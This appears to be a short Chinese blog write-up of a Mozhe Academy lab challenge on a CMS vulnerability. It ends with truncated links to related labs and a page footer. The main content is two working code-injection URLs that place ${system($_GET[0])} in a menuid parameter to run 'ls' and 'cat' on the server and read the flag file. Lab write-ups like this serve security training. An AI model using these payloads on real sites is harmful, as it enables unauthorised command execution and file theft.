御剑扫描发现后台登录地址 admin.php
登录后台http://ip地址/admin.php
后台用户名密码自动补充
界面 > 模板管理 > 模板风格 >search >index.html
登入后台,直接URL上执行
http://ip地址/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block
可以查看到key的名称
执行
```
http://ip地址/index.php?0=cat%20key_XXXX.php&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block
```
查看网页源文件,可以查看到key的内容。
御剑扫描发现后台登录地址 admin.php 登录后台http://ip地址/admin.php 后台用户名密码自...
靶场地址:https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRU...
靶场地址:https://www.mozhe.cn/bug/detail/UFZ4K3FhM0JudDdyempz...
靶场地址:https://www.mozhe.cn/bug/detail/dS85cFFTQnl1cUZHa3Bs...
靶场地址: https://www.mozhe.cn/bug/detail/c2lPNDl1cVUydGFCUnY...
靶场地址:https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxz...
靶场地址:https://www.mozhe.cn/bug/detail/eHAzLzNPdVUvbkRvOS9u...
靶场地址:https://www.mozhe.cn/bug/detail/VkFCM3lXb0t5dFBNNkVL...
靶场地址:https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4...
一、漏洞简介 新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开...
本文标题:墨者学院 - CMS系统漏洞分析溯源(第2题)
本文链接:https://www.haomeiwen.com/subject/devqoftx.html
网友评论